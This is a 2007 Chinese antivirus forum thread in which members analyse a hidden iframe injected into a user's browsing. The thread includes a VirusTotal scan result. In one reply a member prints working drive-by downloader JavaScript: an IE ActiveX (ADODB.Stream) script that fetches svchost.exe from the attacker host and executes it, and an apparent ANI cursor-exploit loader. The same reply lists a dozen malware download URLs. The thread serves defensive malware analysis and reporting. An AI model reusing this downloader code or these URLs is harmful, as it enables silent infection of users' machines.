http://7y7.us/1.htm

显示全部楼层 · 发表于 2007-4-28 15:34:38

主题：有的网页打开是乱码.！请问怎么回事？

楼主
lingdudu

头衔:社区会员
等级:新手上路
文章:1
注册:2007-4-28

有的网页打开是全是乱码，比如百度，9城等这些！！！

字符编码改的是简体中文GB2312

C盘发现一个生成的ip.txt的文档

前面的代码是

<iframe src=http://7y7.us/1.htm width=0 height=0></iframe> <html>

<head>
<meta http-equiv="Content-Type" c>
<title>[VBnet Internet] Public IP Address SSI Page</title>
</head>

<body>

发贴时间:2007-4-28 15:29:33

→ 多长时间能收到上报病毒的回复邮件？

第1楼
星10000

头衔:社区会员
等级:初出茅庐
文章:105
注册:2007-2-28

显示全部楼层 · 发表于 2007-4-28 15:52:12

过小红伞，已经上报.

显示全部楼层 · 发表于 2007-4-28 15:56:15

Complete scanning result of "1__.zip", received in VirusTotal at 04.28.2007, 09:47:08 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.4.28.0 04.27.2007 no virus found
AntiVir 7.4.0.15 04.28.2007 no virus found
Authentium 4.93.8 04.27.2007 no virus found
Avast 4.7.981.0 04.26.2007 no virus found
AVG 7.5.0.464 04.26.2007 no virus found
BitDefender 7.2 04.28.2007 no virus found
CAT-QuickHeal 9.00 04.27.2007 no virus found
ClamAV devel-20070416 04.28.2007 no virus found
DrWeb 4.33 04.28.2007 no virus found
eSafe 7.0.15.0 04.27.2007 no virus found
eTrust-Vet 30.7.3601 04.27.2007 no virus found
Ewido 4.0 04.27.2007 no virus found
FileAdvisor 1 04.28.2007 no virus found
Fortinet 2.85.0.0 04.28.2007 no virus found
F-Prot 4.3.2.48 04.27.2007 no virus found
F-Secure 6.70.13030.0 04.28.2007 no virus found
Ikarus T3.1.1.5 04.28.2007 no virus found
Kaspersky 4.0.2.24 04.28.2007 no virus found
McAfee 5019 04.27.2007 no virus found
Microsoft 1.2405 04.28.2007 no virus found
NOD32v2 2225 04.27.2007 no virus found
Norman 5.80.02 04.27.2007 no virus found
Panda 9.0.0.4 04.28.2007 no virus found
Prevx1 V2 04.28.2007 no virus found
Sophos 4.16.0 04.23.2007 no virus found
Sunbelt 2.2.907.0 04.19.2007 no virus found
Symantec 10 04.28.2007 no virus found
TheHacker 6.1.6.095 04.15.2007 no virus found
VBA32 3.11.4 04.28.2007 no virus found
VirusBuster 4.3.7:9 04.27.2007 no virus found
Webwasher-Gateway 6.0.1 04.28.2007 no virus found

Aditional Information
File size: 3347 bytes
MD5: 3e4c8b15a9809c419dc82a44472afee1
SHA1: 2888c21b0eb174a86d30227d2bd1dc5d81af6258

显示全部楼层 · 发表于 2007-4-28 16:09:45

上报了

显示全部楼层 · 发表于 2007-4-28 16:53:09

显示全部楼层 · 发表于 2007-4-28 17:42:26

http://www.7y7.us/oK/new.js

info = "<head>" +"\n"+
"<meta http-equiv="Content-Language" content="zh-cn">" +"\n"+
"</head>" +"\n"+
"<div id="new_content_jp" style="display:none"></div>" +"\n"+
"<div id="new_content_jp" style="display:none"></div>" +"\n"+
"<script language="javascript" >" +"\n"+
"function checkIE(){" +"\n"+
"var jpDiv = document.getElementById("new_content_jp")" +"\n"+
"var a=navigator.userAgent.toLowerCase();" +"\n"+
"if (navigator.appVersion.indexOf(\'MSIE\')!=-1){" +"\n"+
" version=parseFloat(navigator.appVersion.split(\'MSIE\')[1])" +"\n"+
" if (version>5 && version<=7){" +"\n"+
" w2k = ((a.indexOf(\'windows nt 5.0\')!=-1) || (a.indexOf(\'windows 2000\')!=-1));" +"\n"+
" wxp = ((a.indexOf(\'windows nt 5.1\')!=-1) || (a.indexOf(\'windows xp\')!=-1));" +"\n"+
" w2k3 = ((a.indexOf(\'windows nt 5.2\')!=-1) || (a.indexOf(\'windows 2003\')!=-1));" +"\n"+
"" +"\n"+
" if(wxp)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/ws91.com\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/ws91.com\\/oK\\/MyTest2.jpg)\\">";" +"\n"+
" if(w2k)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/ws91.com\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/ws91.com\\/oK\\/MyTest2.jpg)\\">";" +"\n"+
" }" +"\n"+
"" +"\n"+
"}" +"\n"+
"" +"\n"+
"}" +"\n"+
"setTimeout("checkIE();",300);" +"\n"+
"</script>"
document.write(info)

复制代码

http://www.7y7.us/oK/Vernum.js

function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; } try { dl='http://7y7.us/oK/svchost.exe'; var df=document.createElement("object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }

复制代码

样本：http://7y7.us/oK/svchost.exe，下载者一个，下载下面一堆（最近懒了，样本自己下载吧）：

http://www.beginget.com/GetVer/Ver.txt
http://7y7.us/Sign/csrss.exe
http://7y7.us/Sign/svchost32.exe
http://7y7.us/Sign/smss.exe
http://7y7.us/Sign/services.exe
http://7y7.us/Sign/svchost.exe
http://7y7.us/Sign/conime.exe
http://7y7.us/Sign/ctfmon.exe
http://7y7.us/Sign/mmc.exe
http://7y7.us/Sign/IEXPLORE.EXE
http://7y7.us/Sign/srogm.exe

ani的就算了，想下载的自己在上面的代码里面找

[ 本帖最后由 dikex 于 2007-4-28 17:45 编辑 ]

显示全部楼层 · 发表于 2007-4-28 17:45:17

就知道刺猬会来分析的

显示全部楼层 · 发表于 2007-4-28 17:46:36

原帖由 jlennon 于 2007-4-28 17:45 发表
就知道刺猬会来分析的

最近学到了些新东西，正好拿来实践一下

显示全部楼层 · 发表于 2007-4-29 10:24:43

原帖由 dikex 于 2007-4-28 04:46 发表

最近学到了些新东西，正好拿来实践一下

请用如何解密的

显示全部楼层 · 发表于 2007-4-29 10:46:52

卡巴斯基反病毒6.0
The requested URL http://bbs.kafan.cn/attachment.php?aid=61009 is infected with Trojan-Downloader.JS.Psyme.fy virus

[病毒样本] http://7y7.us/1.htm

本帖子中包含更多资源

本帖子中包含更多资源